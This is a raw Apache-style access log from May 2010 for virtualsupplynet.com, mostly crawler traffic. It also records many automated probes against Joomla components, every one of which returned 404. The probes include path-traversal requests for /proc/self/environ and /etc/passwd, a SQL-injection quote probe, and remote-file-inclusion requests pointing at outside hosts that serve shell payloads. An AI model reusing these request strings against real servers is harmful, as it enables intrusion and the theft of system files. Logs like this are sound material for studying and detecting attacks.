208.80.193.41 - - [14/May/2010:17:15:45 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.0)" "virtualsupplynet.com"
173.192.220.100 - - [14/May/2010:17:36:04 -0700] "GET /joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
173.192.220.100 - - [14/May/2010:17:42:44 -0700] "GET /logs/access_100130.log/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
173.192.220.100 - - [14/May/2010:17:42:44 -0700] "GET /joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
173.192.220.100 - - [14/May/2010:17:42:44 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
67.195.115.87 - - [14/May/2010:18:31:21 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [14/May/2010:18:31:23 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.110.174 - - [14/May/2010:21:29:29 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [14/May/2010:21:29:29 -0700] "GET /logs/ HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [14/May/2010:21:33:24 -0700] "GET /logs/access_100123.log HTTP/1.0" 200 137637 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [14/May/2010:22:23:23 -0700] "GET /logs/?S=A HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [14/May/2010:22:25:35 -0700] "GET /logs/scripts.log HTTP/1.0" 200 1192 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
95.108.150.235 - - [15/May/2010:01:30:51 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [15/May/2010:01:30:53 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [15/May/2010:01:30:54 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [15/May/2010:01:30:55 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [15/May/2010:01:30:56 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [15/May/2010:01:30:58 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:02:05:52 -0700] "GET /logs/?D=A HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:09:18 -0700] "GET /logs/access_100130.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:09:18 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:09:18 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:09:18 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:09:18 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:09:18 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:09:18 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:09:18 -0700] "GET /logs/access_100130.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:09:18 -0700] "GET /logs/access_100130.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:10:30 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:10:30 -0700] "GET /logs/access_100130.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
210.116.103.153 - - [15/May/2010:02:10:30 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:02:57:07 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
198.170.141.58 - - [15/May/2010:03:15:23 -0700] "GET /logs/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
198.170.141.58 - - [15/May/2010:03:15:23 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
61.8.3.157 - - [15/May/2010:03:47:31 -0700] "GET /logs/*.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
61.8.3.157 - - [15/May/2010:03:47:31 -0700] "GET /*.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
61.8.3.157 - - [15/May/2010:03:48:44 -0700] "GET /logs/*.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
61.8.3.157 - - [15/May/2010:03:48:44 -0700] "GET /*.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:04:30:26 -0700] "GET /logs/access_100417.log HTTP/1.0" 200 70879 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:07:51:38 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:07:51:38 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:09:32:56 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
211.245.21.109 - - [15/May/2010:09:37:23 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
211.245.21.109 - - [15/May/2010:09:37:26 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:10:03:59 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.115.87 - - [15/May/2010:11:38:43 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:12:24:35 -0700] "GET /logs/scripts.log HTTP/1.0" 200 1192 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
208.80.193.42 - - [15/May/2010:13:10:21 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AskBar 3.00; .NET CLR 1.1.4322)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:14:00:24 -0700] "GET /logs/access_090905.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:14:06:21 -0700] "GET /logs/access_091114.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:14:24:34 -0700] "GET /logs/access_100116.log HTTP/1.0" 200 153883 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.115.87 - - [15/May/2010:15:08:53 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [15/May/2010:15:08:53 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:15:32:04 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.115.87 - - [15/May/2010:17:35:54 -0700] "GET /logs/access_090815.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [15/May/2010:18:14:58 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:19:05:08 -0700] "GET /logs/access_090919.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.115.87 - - [15/May/2010:19:14:43 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:21:02:50 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:21:02:50 -0700] "GET /logs/access_090815.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:21:08:05 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [15/May/2010:23:46:38 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
208.80.193.39 - - [16/May/2010:00:26:42 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "virtualsupplynet.com"
67.195.110.174 - - [16/May/2010:00:39:55 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
121.88.4.141 - - [16/May/2010:00:43:32 -0700] "GET /logs/index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
121.88.4.141 - - [16/May/2010:00:43:33 -0700] "GET /index.php?option=com_joomlalib&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
67.195.110.174 - - [16/May/2010:01:42:13 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
174.123.119.50 - - [16/May/2010:02:09:50 -0700] "GET /logs///administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
174.123.119.50 - - [16/May/2010:02:09:50 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
67.195.110.174 - - [16/May/2010:02:26:24 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.115.87 - - [16/May/2010:03:31:11 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [16/May/2010:03:31:12 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [16/May/2010:04:02:33 -0700] "GET /logs/access_091114.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
66.249.65.56 - - [16/May/2010:04:56:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.virtualsupplynet.com"
67.195.115.87 - - [16/May/2010:06:44:08 -0700] "GET /logs/access_100116.log HTTP/1.0" 200 153883 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [16/May/2010:10:45:27 -0700] "GET /?M=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:01:17 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:01:17 -0700] "GET /logs/access_100410.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:01:17 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:07:18 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:07:18 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:07:18 -0700] "GET /logs/access_100410.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:13:32 -0700] "GET /logs/access_100410.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:13:32 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:13:32 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:17:34 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:17:34 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
124.0.74.195 - - [16/May/2010:11:17:34 -0700] "GET /logs/access_100410.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
211.232.85.247 - - [16/May/2010:12:09:51 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
211.232.85.247 - - [16/May/2010:12:09:52 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
121.88.4.141 - - [16/May/2010:12:55:54 -0700] "GET /logs//administrator/components/com_uhp/*.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
121.88.4.141 - - [16/May/2010:12:55:54 -0700] "GET /administrator/components/com_uhp/*.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
91.121.67.142 - - [16/May/2010:14:57:08 -0700] "GET /logs/access_100410.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://playlandia.crewlabs.net/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
91.121.67.142 - - [16/May/2010:14:57:08 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://playlandia.crewlabs.net/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
91.121.67.142 - - [16/May/2010:14:57:08 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://playlandia.crewlabs.net/id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.195.110.174 - - [16/May/2010:15:38:49 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [16/May/2010:15:38:49 -0700] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [16/May/2010:17:51:04 -0700] "GET /logs/?N=D HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.115.87 - - [16/May/2010:18:18:53 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.87 - - [16/May/2010:18:18:53 -0700] "GET /logs/?S=A HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.110.174 - - [16/May/2010:19:10:16 -0700] "GET /logs/access_090926.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
188.40.72.10 - - [16/May/2010:19:28:35 -0700] "GET /logs/index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
188.40.72.10 - - [16/May/2010:19:28:35 -0700] "GET /index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
202.125.44.136 - - [16/May/2010:19:38:07 -0700] "GET /logs/index.php?base_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
202.125.44.136 - - [16/May/2010:19:38:07 -0700] "GET /index.php?base_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
202.125.44.136 - - [16/May/2010:19:38:09 -0700] "GET /logs/index.php?base_dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
202.125.44.136 - - [16/May/2010:19:38:10 -0700] "GET /index.php?base_dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
208.80.193.40 - - [16/May/2010:20:29:02 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; SpamBlockerUtility 4.8.4)" "www.virtualsupplynet.com"
95.108.150.235 - - [16/May/2010:21:29:52 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [16/May/2010:21:29:53 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [16/May/2010:21:29:54 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [16/May/2010:21:29:55 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [16/May/2010:21:29:56 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [16/May/2010:21:29:58 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
74.222.2.74 - - [16/May/2010:22:01:20 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "url_test (larbin2.6.3@unspecified.mail)" "virtualsupplynet.com"
74.222.2.74 - - [16/May/2010:22:01:50 -0700] "GET / HTTP/1.0" 200 763 "-" "url_test larbin2.6.3@unspecified.mail" "virtualsupplynet.com"
193.47.80.41 - - [16/May/2010:22:03:34 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
193.47.80.41 - - [16/May/2010:22:03:35 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
88.250.57.232 - - [16/May/2010:22:36:52 -0700] "GET /logs/access_100516.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [16/May/2010:22:36:53 -0700] "GET /logs/access_100517.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
207.210.85.138 - - [17/May/2010:00:04:37 -0700] "GET /logs/index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.virtualsupplynet.com"
207.210.85.138 - - [17/May/2010:00:04:37 -0700] "GET /logs/index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.virtualsupplynet.com"
207.210.85.138 - - [17/May/2010:00:04:37 -0700] "GET /index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.virtualsupplynet.com"
207.210.85.138 - - [17/May/2010:00:04:37 -0700] "GET /index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.virtualsupplynet.com"
207.210.85.138 - - [17/May/2010:00:04:37 -0700] "GET /logs/index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.virtualsupplynet.com"
207.210.85.138 - - [17/May/2010:00:04:37 -0700] "GET /index.php?base_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.811" "www.virtualsupplynet.com"
